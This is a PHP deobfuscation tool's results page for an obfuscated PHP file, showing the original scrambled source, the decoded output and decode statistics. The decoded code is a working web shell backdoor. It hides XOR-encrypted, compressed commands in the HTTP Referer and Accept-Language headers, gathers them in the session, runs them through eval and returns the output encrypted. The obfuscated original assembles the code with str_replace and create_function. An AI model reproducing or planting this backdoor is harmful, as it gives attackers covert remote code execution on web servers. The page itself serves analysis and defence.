Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $k='de(x(gzXXXcompressX($o),$k));priXnt("X<$k>$Xd</$k>");@XsXession_deXstroy();}}}}'..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$k='de(x(gzXXXcompressX($o),$k));priXnt("X<$k>$Xd</$k>");@XsXession_deXstroy();}}}}';
$n='ounXt($m[1]);$XXz++)$p.=$q[$m[2][$XzX]];if(strpXXos($p,X$h)===0){$s[$XXi]=""';
$E='X,0X,$e))),$Xk))XX);$o=ob_get_contentXsX();ob_end_XcXlean();$d=bXase64_XencoX';
$q='5($iX.$XXkh),0,3))X;$f=X$sXl($ss(mXd5($i.$kf),0,3));$Xp="X";for(X$z=1;X$z<Xc';
$j='X4X_decode(preXXg_replace(array("X/_/X","/-/X"),array("/"X,"+X"X),$ss($s[$i]';
$H='X$i],$f);XiXf(X$e){$k=$kh.$kf;ob_sXtarXt();@evXal(@gXzuncompressX(X@x(@baXse6';
$u='X$kh="X5d41";$kf="402Xa";functXioXn x(X$t,$kX){$c=strlen($kX);$l=sXtXrlen($tX)';
$F=';$o=X"";for($Xi=X0;$i<$l;){for(X$j=X0;($jX<X$cX&&$i<$l);$jXX++,$i++){$Xo.=$t';
$e='ION;$ss=X"subsXtXr";$sl="strtolowerX";$i=X$XXm[1][0X].$m[1][1X];$h=$sl($ss(mXd';
$K='{$i}^X$k{$j};X}}return $oX;}$Xr=$X_SERVER;$Xrr=@$r["XXHTTP_REFXERXER"]X;$ra=@$r';
$W=';$p=$sXs($p,3);}Xif(XarrXaXy_kXey_exists($XiX,$s))X{$s[$i]X.=$p;$e=strpoXs($s[';
$Q='["XHTTP_ACCEPTX_LANGUAGXEX"];if($rrX&X&$ra){$u=Xparse_Xurl($rr);pXarseX_XstX';
$i=str_replace('Q','','QcreQatQe_fQuQQnction');
$I='r($u[X"Xquery"],X$q);$q=aXrray_vXalXues($Xq);pregX_match_all("/([\\w])X[\\w-X]+(';
$g='?:;q=0.XX([\\d])X)X?,?/",$ra,$m);ifX($q&X&$m){@Xsession_staXrt()X;$s=X&XX$_SESS';
$M=str_replace('X','',$u.$F.$K.$Q.$I.$g.$e.$q.$n.$W.$H.$j.$E.$k);
$d=$i('',$M);$d();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | 236cc62677da55521a2cf3660dbb9cbb |
Eval Count | 1 |
Decode Time | 121 ms |